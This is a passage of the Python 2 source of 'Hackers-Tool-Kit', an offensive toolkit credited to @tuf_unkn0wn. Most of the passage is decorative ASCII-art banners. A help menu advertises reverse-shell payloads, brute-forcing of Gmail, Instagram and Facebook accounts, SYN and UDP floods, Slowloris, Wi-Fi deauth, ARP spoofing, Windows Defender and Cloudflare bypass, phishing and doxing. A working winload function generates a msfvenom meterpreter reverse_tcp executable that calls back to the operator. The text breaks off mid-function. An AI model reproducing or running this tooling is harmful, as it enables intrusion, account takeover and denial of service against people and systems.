.....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """ - type ? for help -\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - type ? for help - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - - type ? for help - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[91m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - type ? for help - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner8(): - print """ - type ? for help\033[91m - -@@@ /$$ /$$ @@@ -@@@ | $$ | $$ @@@ -@@! | $$ | $$ @@! -!@! | $$$$$$$$ !@! -!!@ | $$__ $$ !!@ -!!! | $$ | $$ !!! -!!: | $$ | $$ !!: -:!: |__/ |__/ :!: -@@@ @@@\033[94m -@@@ @@@ -@@! @@! -!@! /$$$$$$$$ !@! -!!@ |__ $$__/ !!@ -!!! | $$ !!! -!!: | $$ !!: -:!:---------------| $$---------------:!: -@@@ | $$ @@@ -@@@ | $$ @@@ -@@! |__/ @@! -!@! !@!\033[91m -!!@ !!@ -!!! /$$ /$$ !!! -!!: | $$ /$$/ !!: -:!: | $$ /$$/ :!: -@@@ | $$$$$/ @@@ -@@@ | $$ $$ @@@ -@@! | $$\ $$ @@! -!@! | $$ \ $$ !@! -!!@ |__/ \__/ !!@ -!!! !!! -!!: !!: -:!: :!:\033[92m - :: :: -: @tuf_unkn0wn :\033[0m -""" -def mainbanner9(): - print """ -\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ -║ ║ -\033[33m║ ║ -║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ -\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ -║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ -\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ -║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ -\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ -║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ -\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ -║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ -\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ -║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ -\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ -║\033[0m █ ▐ ▀ █ ▐ \033[95m║ -\033[35m║\033[0m ▐ ▐ \033[35m║ -║ ║\033[1;31m -╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m - type ? for help - """.decode('utf-8') - -def mainbanner10(): - print """\033[0m - ░░░▓█▒░▒▒▒▓▓░ - ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ - ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ - ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ - ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ - ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ - ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ - ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ - ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ - ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ - ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ - ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ - ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ - ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ - ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ - ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ - ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ - ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ - ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ - ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ - ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ - ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ - ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ - ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ - ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ - ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ - ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ - ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ - ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ - ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ - ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ - ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ - ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ - ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ - ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ - ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ - ░█▓▓▓▓▓▓███████▓██▓██░ - ░██▓▓▓████████████████░░░ - ░▓▓▓▓▓███████▓█▓████████░ ░░░ - ░░░█▓█████████████████████████▓▓▓▒░░░░░░ - ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ - ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ - ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ - ░░▓█▓█▓█████████████████████████████░░ - \033[0m""".decode('utf-8') -def mainbanner11(): - print """\033[91m - ██████╗ ██████╗ ██████╗ - ██╔════╝ ██╔════╝ ██╔════╝ - ███████╗ ███████╗ ███████╗ - ██╔═══██╗██╔═══██╗██╔═══██╗ - ╚██████╔╝╚██████╔╝╚██████╔╝ - ╚═════╝ ╚═════╝ ╚═════╝ - ░░░░ ░░░░░ - ░▒███████▓▒░░ ░░░████████▓░░░ - ░▓████████████▒░░ ░░█████████████░░ - ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ - ░ ░██████▒░ ░░░░███████ ░░ - ░░███████░░ ░░██████▓░ - ░███████░░ ░▒██████▒ - ░░░░ ░░███████░░░███████▒░ ░░░ - ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ - ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ - ░▒██████████████▒████████▒██████████████░░ - ░░██████████████▒░███▒▒▒█████████████░░ - ░░░░▓████████░█░▓▓▒████████▒░░░░░ - ░░████████▓░██░████████▒░░░ - ░░▒██████░▒▒░░▒░░██████░ - ░░█████████▓░█░████▓███▓░ - ░▒█▓░▒██████▒███████░░█▓░ - ░░░███████████████████▓░░ - ░▒▓████████████████▒░ - ░░▒███████████████▓▒░ - ░▒█████▓██████░░ - ░██████████░ - @tuf_unkn0wn ░█████████▒ type ? for help - █████████░░ - ░░████████░░ - ░▓█████▓░ - ░▓████▒░ - ░░████░ - ░░░▒██░░ - ░█▓░ - ░░▓░░ - ░░░░░ - ░░ - \033[0m""".decode('utf-8') -def mainbanner12(): - print """\033[91m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner13(): - print """\033[92m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner14(): - print """\033[34m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner15(): - print """\033[93m - __ _ - _wr"" "-q__ - _dP 9m_ - _#P 9#_ - d#@ \033[92mtype ? for help\033[93m 9#m - d## ### - J### ###L - {###K J###K - ]####K ___aaa___ J####F - __gmM######_ w#P"" ""9#m _d#####Mmw__ - _g##############mZ_ __g##############m_ - _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ - a###"" ,Z"#####@" '######"\g ""M##m - J#@" 0L "*## ##@" J# *#K - #" `# "_gmwgm_~ dF `#_ -7F "#_ ]#####F _dK JE -] *m__ ##### __g@" F - \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m - ` 0######_ ' - _0########_ - . _d#####^#####m__ , - "*w_________am#####P" ~9#####mw_________w*" - ""9@#####@M"" ""P@#####@M"" -\033[92m - ██░ ██ ▄▄▄█████▓ ██ ▄█▀ - ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ - ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ - ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ - ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ - ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ - ▒ ░▒░ ░ ░ ░ ░▒ ▒░ - ░ ░░ ░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░\033[0m - """.decode('utf-8') -def mainbanner16(): - print """\033[91m - :PB@Bk: - ,jB@@B@B@B@BBL. - 7G@B@B@BMMMMMB@B@B@Nr - :kB@B@@@MMOMOMOMOMMMM@B@B@B1, - :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. - 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr - G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S - @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ - B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B - @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ - @@OLB. BNB@MMOMOMM@BEB rBjM@B - @@ @ M OBOMOMM@q M .@ @@ - @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B - @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ - B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B - @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ - B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M - J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv - iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: - . B@M@B@MMM@B@B@B@MMM@@@M@B - @B@B.i@MBB@B@B@@BM@::B@B@ - B@@@ .B@B.:@B@ :B@B @B@O - :0 r@B@ B@@ .@B@: P: - vMB :@B@ :BO7 - ,B@B\033[0m - - \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m - ███████████████████████████ - type █?█ for help - ███ - \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ - ██ ██ \033[0m███\033[31m ██ ██▀ - ██ ██ \033[0m███\033[31m ██▄██ - ████████ \033[0m███\033[31m █████ - ██ ██ \033[0m███\033[31m ██ ██▄ - ██ ██ \033[0m███\033[31m ██ ██▄ - ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m - """.decode('utf-8') -def mainbanner17(): - print """ - - .---. - |---| - type |-\033[32m?\033[0m-| for help - |---| - .---^ - ^---. - :___________: - \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m - ███ ███ | |//| ███ ▄███▀ - ███ ███ | |//| ███▐██▀ - ███▄▄▄▄███ | |//| █████▀ - ███▀▀▀▀███ | |//| █████▄ - ███ ███ | |//| ███▐██▄ - ███ ███ | |.-| ███ ▀███▄ - \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m - \***/ - \*\033[91m/\033[31m - V\033[0m - """.decode('utf-8') - -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,17) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() - if num == 8: - mainbanner8() - if num == 9: - mainbanner9() - if num == 10: - mainbanner10() - if num == 11: - mainbanner11() - if num == 12: - mainbanner12() - if num == 13: - mainbanner13() - if num == 14: - mainbanner14() - if num == 15: - mainbanner15() - if num == 16: - mainbanner16() - if num == 17: - mainbanner17() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -clear : clears screen except for banner -clearall: clears everything on screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -phpload : make a php reverse_tcp payload and start it in a multi handler -pyload : make a python reverse_tcp payload and start it in a multi handler -foxhis : gather firefox history from privileged javascript shell -rhawk : run the RED_HAWK script (info gathering tool) -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = 